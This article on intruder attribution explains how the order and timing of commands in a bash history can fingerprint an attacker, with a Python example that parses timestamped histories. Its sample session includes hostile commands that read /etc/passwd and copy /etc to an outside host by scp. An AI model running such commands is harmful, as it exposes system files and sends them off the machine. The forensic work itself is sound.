Bash Histories, and System Commands (More Than Meets The Eye)

So, we've now taken a brief look at some of the ways one can develop "fields" and "fingerprints" from hacked webpages. But how can we develop a "fingerprint", or come up with fields, if a system machine was hacked and not simply a webserver? Welcome to the world of rootkits and system commands! I'm not going to go very in-depth here, but I will describe a couple of interesting "fields", some probably more obvious than others.

Who Does What When?

Different hackers will do different things when they first enter a system, and they tend to do the same things EVERY TIME. Do they check to see if root is on first? Do they take a quick look at the directory structure? Look at the active system processes? Do they just start off loading everything they see onto a remote system? Not only can the order of commands provide a "field", it can also give insights into the "technical maturity" of the hacker, and even their motives (think about that last one for a minute).

Here's a tricky one: how fast is the hacker typing in his commands? Is he fumbling, with long pauses in between? Or is he throwing command after command after command into the system?

What exploit was originally used to gain access to the system? Was it an old, well-known vulnerability that could be exploited with something from rootshell? Or was it something new, that could be associated with a particular group or two suspected of having developed it, or of having access to it? (This would require some "intelligence work", I'll admit.)

Now, you probably won't be so lucky as to simply have a bunch of syslogs lying around after the hacker has left. But there are other ways that the actions of users on your systems can be, and should be (and on most "important systems" are), logged. These are just a few examples. But you can see that even though we don't have any "physical evidence" or "visibly unique evidence", we are still able to come up with identifiable fields.
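To make the two "fields" above concrete (the order of the first commands an intruder runs, and the pauses between them), here is an added example that is not part of the original text. It assumes a bash history file written with HISTTIMEFORMAT set, in which bash records a `#<epoch seconds>` line before each command; the history content below is constructed for the example, as is the comparison between two recovered sessions.

```python
"""Derive simple investigator 'fields' from a timestamped bash history.

Added example, not from the original article. Assumes the bash HISTFILE
format used when HISTTIMEFORMAT is set: a '#<epoch>' line precedes each
command. Sample data below is constructed, not a real capture.
"""
from dataclasses import dataclass
from statistics import median
from typing import Optional
import shlex

# Constructed sample history for one recovered session.
SAMPLE_HISTORY = """\
#1700000000
w
#1700000003
ls -la /
#1700000004
ps aux
#1700000021
cat /etc/passwd
#1700000060
scp -r /etc user@203.0.113.10:/tmp/
"""


@dataclass
class HistoryEntry:
    timestamp: Optional[int]   # None when the history carries no timestamps
    command: str


def parse_history(text: str) -> list[HistoryEntry]:
    """Pair each command line with the '#<epoch>' line that precedes it."""
    entries, pending = [], None
    for raw in text.splitlines():
        line = raw.rstrip("\n")
        if not line.strip():
            continue
        if line.startswith("#") and line[1:].isdigit():
            pending = int(line[1:])        # timestamp for the next command
            continue
        entries.append(HistoryEntry(pending, line))
        pending = None
    return entries


def command_name(command: str) -> str:
    """First word of the command line, tolerating unbalanced quotes."""
    try:
        parts = shlex.split(command)
    except ValueError:
        parts = command.split()
    return parts[0] if parts else ""


def command_sequence(entries: list[HistoryEntry], n: int = 5) -> list[str]:
    """The 'who does what first' field: names of the first n commands."""
    return [command_name(e.command) for e in entries[:n]]


def timing_profile(entries: list[HistoryEntry], burst_seconds: int = 2) -> dict:
    """The typing-cadence field: gaps between consecutive timestamped commands."""
    gaps = []
    for prev, cur in zip(entries, entries[1:]):
        if prev.timestamp is not None and cur.timestamp is not None:
            gaps.append(cur.timestamp - prev.timestamp)
    return {
        "gaps": gaps,
        "median_gap": median(gaps) if gaps else None,
        "max_gap": max(gaps) if gaps else None,
        # gaps this short look pasted or scripted rather than typed and read
        "burst_count": sum(1 for g in gaps if g <= burst_seconds),
    }


def sequence_similarity(a: list[str], b: list[str]) -> float:
    """Longest common subsequence of two command sequences, as a ratio of the
    longer length; used to compare the order field across two intrusions."""
    if not a or not b:
        return 0.0
    prev = [0] * (len(b) + 1)
    for x in a:
        cur = [0]
        for j, y in enumerate(b, 1):
            cur.append(prev[j - 1] + 1 if x == y else max(prev[j], cur[j - 1]))
        prev = cur
    return prev[-1] / max(len(a), len(b))


def fingerprint(text: str) -> dict:
    entries = parse_history(text)
    return {"sequence": command_sequence(entries), **timing_profile(entries)}


if __name__ == "__main__":
    fp = fingerprint(SAMPLE_HISTORY)
    print(fp)   # constructed session: ['w', 'ls', 'ps', 'cat', 'scp'], gaps [3, 1, 17, 39]
    # compare against a second (constructed) session's opening commands
    print(sequence_similarity(fp["sequence"], ["w", "ps", "id", "scp"]))
```

The order field is deliberately only the first few command names, since that is the part of a session an operator tends to repeat; the cadence field keeps the raw gaps as well as summaries, so an investigator can see whether a long pause sits before a particular command rather than being averaged away.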